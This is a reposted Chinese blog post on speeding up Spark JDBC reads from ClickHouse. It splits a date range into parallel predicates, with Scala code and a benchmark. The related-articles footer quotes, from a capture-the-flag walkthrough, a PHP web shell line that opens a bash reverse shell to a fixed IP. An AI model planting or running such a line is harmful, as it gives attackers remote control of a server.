spark读取数据性能提升

news2025/1/15 20:37:00

1. 背景

spark默认的jdbc只会用单task读取数据,读取大数据量时,效率低。

2. 解决方案

根据分区字段,如日期进行划分,增加task数量提升效率。

  /**
    * 返回每个task按时间段划分的过滤语句
    * @param startDate
    * @param endDate
    * @param threadCount
    * @return
    */
  def getPredicateDates(startDate: String, endDate: String, threadCount: Int): Array[String] = {
    getPredicates(startDate, endDate, threadCount).map(x=>s"recordDate>='${x._1}' and recordDate <='${x._2}'")
  }


  /**
    * 将startDate到endDate间的日期,根据给定的threadCount参数,做时间段划分,例如:
    * getPredicates("2017-01-01", "2017-01-31", 10)
    * 返回:
    * 2017-01-01 -> 2017-01-04
    * 2017-01-05 -> 2017-01-08
    * 2017-01-09 -> 2017-01-12
    * 2017-01-13 -> 2017-01-16
    * 2017-01-17 -> 2017-01-20
    * 2017-01-21 -> 2017-01-24
    * 2017-01-25 -> 2017-01-28
    * 2017-01-29 -> 2017-01-31
    *
    * @param startDate   开始日期
    * @param endDate     结束日期
    * @param threadCount 线程数
    * @return 包含各个连续时段的数组
    */
  def getPredicates(startDate: String, endDate: String, threadCount: Int): Array[(String, String)] = {
    val dayDiff = DateTimeUtils.rangeDay(startDate, endDate)

    val buff = new ArrayBuffer[(String, String)]()

    if (dayDiff <= threadCount) {
      //天数差小于期望的线程数,则按照每天一个线程处理
      var tempDate = startDate
      while (tempDate <= endDate) {
        buff += (tempDate -> tempDate)
        tempDate = DateTimeUtils.dateAddOne(tempDate)
      }
    } else {
      //天数差大于期望的线程数,则按照线程数对时间段切分
      val offset = (dayDiff / threadCount).toInt
      var tempDate = startDate

      while (DateTimeUtils.dateAddN(tempDate, offset) <= endDate) {
        buff += (tempDate -> DateTimeUtils.dateAddN(tempDate, offset))
        tempDate = DateTimeUtils.dateAddOne(DateTimeUtils.dateAddN(tempDate, offset))
      }

      if (tempDate != endDate) {
        buff += (tempDate -> endDate)
      }
    }

    buff.toArray
  }

DateTimeUtils工具类
import java.text.SimpleDateFormat
import java.util.{Calendar, Date, Locale}

object DateTimeUtils {

  def rangeDay(startDateStr: String, endDateStr: String): Long = {
    val dateFormat: SimpleDateFormat = new SimpleDateFormat("yyyy-MM-dd")
    val startDate: Date = dateFormat.parse(startDateStr)
    val endDate: Date = dateFormat.parse(endDateStr)

    (endDate.getTime() - startDate.getTime()) / 1000 / 60 / 60 / 24
  }


  def dateAddOne(dateStr: String): String = {
    var dateFormat: SimpleDateFormat = new SimpleDateFormat("yyyy-MM-dd")
    var dateInfo: Date = dateFormat.parse(dateStr)
    var cal: Calendar = Calendar.getInstance()
    cal.setTime(dateInfo)
    cal.add(Calendar.DATE, 1)
    dateFormat.format(cal.getTime)
  }

  def dateAddN(dateStr: String, value: Int): String = {
    var dateFormat: SimpleDateFormat = new SimpleDateFormat("yyyy-MM-dd")
    var dateInfo: Date = dateFormat.parse(dateStr)
    var cal: Calendar = Calendar.getInstance()
    cal.setTime(dateInfo)
    cal.add(Calendar.DATE, value)
    dateFormat.format(cal.getTime)
  }
}

举例

    val startDate = DateTimeUtils.dateAddN(calcDate,-365) //获取计算日期一年前的日期作为开始时间
    val predicates= getPredicateDates(startDate,calcDate,12) //分12个task读取,提高性能
    val url = PropUtils.getProxyJdbc() //jdbc连接的代理(需按自己的项目实现)
    val res = spark.read.jdbc(url, tableName, predicates,PropUtils.getProperties()) 

3. 实验及结论

使用1个节点 8核16G的Clickhouse数据库,spark从clickhouse读取近4亿行数据。

单Task运行时间:14min

按日期划分成12个Task,运行时间:1.6min

结论:性能提升88.6%

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2154759.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

[Web安全 网络安全]-CSRF跨站请求伪造

文章目录&#xff1a; 一&#xff1a;前言 1.定义 2.攻击原理 3.危害 4.环境 4.1 靶场 4.2 扫描工具 5.cookie session token的区别 6.CSRF与XSS的区别 二&#xff1a;构建CSRF的payload GET请求&#xff1a;a标签 img标签 POST请求&#xff1a;form表单 三&…

Prime1 靶机渗透 ( openssl 解密 ,awk 字符串处理,信息收集)

简介 Prime1 的另一种解法 起步 从初级shell开始 反弹 shell 路径 http://192.168.50.153/wordpress/wp-content/themes/twentynineteen/secret.php 其内的 shell 为 <?php eval("/bin/bash -c bash -i >& /dev/tcp/192.168.50.147/443 0>&1"…

【linux】nice命令

Linux中的nice命令是一个强大的工具&#xff0c;用于调整进程的优先级&#xff0c;进而影响它们在CPU上的资源分配和执行顺序。以下是关于nice命令的详细解释&#xff0c;包括其用途、语法、参数、示例以及使用建议。 一、用途 nice命令主要用于控制进程在CPU上的调度优先级&…

Springboot3 + MyBatis-Plus + MySql + Uniapp 实现商品规格选择sku(附带自设计数据库,最新保姆级教程)

Springboot3 MyBatis-Plus MySql Uniapp 实现商品规格选择sku&#xff08;附带自设计数据库&#xff0c;最新保姆级教程&#xff09; 1、效果展示2、数据库设计2.1 商品表2.2 商品价格和规格中间表2.3 商品规格表 3、后端代码3.1 model3.2 vo3.3 mapper、server、serverImp3…

DNS是什么?怎么设置

NS是什么意思?有什么用呢?专业的说DNS就是域名系统 (Domain Name System)的简称&#xff0c;也就是IT人士常说的域名解析系统。主要是让用户在互联网上通过域名找到域名对应的IP地址&#xff0c;因为IP地址都是一串数字(例如&#xff1a;192.168.0.1)不方便记忆&#xff0c;便…

华为全联接大会HUAWEI Connect 2024印象(一):OpenEuler

因为和华为有课程合作&#xff0c;此次应邀参加了华为全联接大会 &#xff08;HUAWEI Connect 2024&#xff09;&#xff0c;分几次分享一下自己的见闻。 HUAWEI Connect 2024的规模很大&#xff0c;不过主要面向的应该是企业市场&#xff0c;我比较关注的嵌入式系统的内容很少…

学习笔记——RegNet:Designing Network Design Spaces

RegNet&#xff1a;Designing Network Design Spaces RegNet&#xff1a;设计一个网络设计空间 论文地址&#xff1a; https://arxiv.org/pdf/2003.13678 1、前言 在这项工作中&#xff0c;作者提出了一种新的网络设计范例。 作者的目标是帮助增进对网络设计的理解并发现跨设置…

Stable Diffusion Fooocus批量绘图脚本

当当当挡~&#xff0c;流动传热数值计算之余发布点AIGC相关文章&#xff0c;希望大家能喜欢~ 1 Stable Diffusion各种UI分析对比 提示&#xff1a;此部分主要是对SD各种界面的简要介绍和对比&#xff0c;只关注Fooocus批量绘图的读者可直接跳到第二部分。 Stable Diffusion …

进程间的通信4 共享内存

共享内存 1.共享内存简介 共享内存是将分配的物理空间直接映射到进程的用户虚拟地址空间中&#xff0c;减少数据在内核空间缓存共享内存是一种效率较高的进程间通讯的方式在 Linux 系统中通过 ipcs -m 查看所有的共享内存 共享内存模型图 2.共享内存的创建 1.函数头文件 #…

【6DRepNet360全范围头部姿态估计onnxruntime推理】

6DRepNet360全范围头部姿态估计 标题摘要关键词主要贡献方法概述实验结论模型转换和onnxruntime推理模型和代码下载可视化结果代码 这篇论文的核心内容是关于一种用于全范围旋转头部姿态估计的新方法。以下是关键点的总结&#xff1a; 标题 Towards Robust and Unconstrained…

输电线路数据集

输电线路数据集&#xff08;绝缘子自爆&#xff0c;破损&#xff0c;闪络&#xff0c;鸟巢&#xff0c;防震锤脱落五种缺陷&#xff09; 包括 1.绝缘子自爆 2.绝缘子破损绝、闪络 3.鸟巢 4.防震锤脱落 数据增强后的数量 对应数量&#xff1a;1828&#xff0c;1467&#xff0c;4…

【Godot4.3】剪贴板相关以及粘贴截图

概述 Godot4.3中更新了一些关于剪贴板的方法&#xff0c;获取图片赫然在列&#xff0c;这意味着可以在自己的应用中创建诸如粘贴截图的功能。 这些方法被包含在DisplaySever单例中&#xff0c;有兴趣的戈友可以自己去翻一下文档。或许可以实现Godot版本的屏幕截图工具。 相关…

Java | Leetcode Java题解之第414题第三大的数

题目&#xff1a; 题解&#xff1a; class Solution {public int thirdMax(int[] nums) {Integer a null, b null, c null;for (int num : nums) {if (a null || num > a) {c b;b a;a num;} else if (a > num && (b null || num > b)) {c b;b num;…

Maven笔记(二):进阶使用

Maven笔记&#xff08;二&#xff09;-进阶使用 一、Maven分模块开发 分模块开发对项目的扩展性强&#xff0c;同时方便其他项目引入相同的功能。 将原始模块按照功能拆分成若干个子模块&#xff0c;方便模块间的相互调用&#xff0c;接口共享(类似Jar包一样之间引用、复用)…

【LLM学习之路】9月16日 第六天

【LLM学习之路】9月16日 第六天 损失函数 L1Loss 可以取平均也可以求和 参数解析 input &#xff08;N&#xff0c;*&#xff09; N是batchsize&#xff0c;星号代表可以是任意维度 不是输入的参数&#xff0c;只是描述数据 target 形状要同上 MSELoss平方差 CrossEntr…

物理学基础精解【7】

文章目录 平面方程直角坐标及基本运算 参考文献 平面方程 直角坐标及基本运算 向量的四则运算 下面由文心一言自动生成 向量的四则运算主要包括加法、减法、数乘&#xff08;标量乘法&#xff09;和数量积&#xff08;点积或内积&#xff09;&#xff0c;但通常不直接称为“除…

python sql中带引号字符串(单双引号)转义处理

描述&#xff1a; 最近在爬取数据保存到数据库时&#xff0c;遇到有引号的字符串插入MySQL报错&#xff1a;1064, "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 转义字符串…

线程(三) 线程的互斥

文章目录 线程线程的同步和互斥线程同步线程互斥为什么要使用线程互斥什么是线程同步示例--线程操作共享资源引发问题 线程互斥--互斥锁示例--使用互斥锁来保证取款操作 互斥锁的属性示例--创建不同的属性的互斥锁后进行加锁操作 线程互斥--读写锁示例--对读写锁进行使用以观察…

鸿蒙【项目打包】- .hap 和 .app;(测试如何安装发的hap包)(应用上架流程)

#打包成.hap需要用到真机 原因是&#xff1a;只有用上了真机才能在项目中配置 自动签名 #步骤: ##第一步:选择真机->选择项目结构->点Sigining Configs(签名配置) ##第二步:勾选Automatically generate signature(自动签名)->点击ok ##第三步:点击构建->点击 …

伊犁云计算22-1 rhel8 dhcp 配置

1 局域网搭建 2 yum 配置 这个参考前面 不说 3 dnf 安装dhcp 好我们废话不说开始安装。理论看书去 进入 dhcp.conf 配置 重启dhcpd 不能报错&#xff01;&#xff01;&#xff01;&#xff01; 我们在客户机上做测试 全局的dhcp关闭 很明显我们的客户机获取到192.16…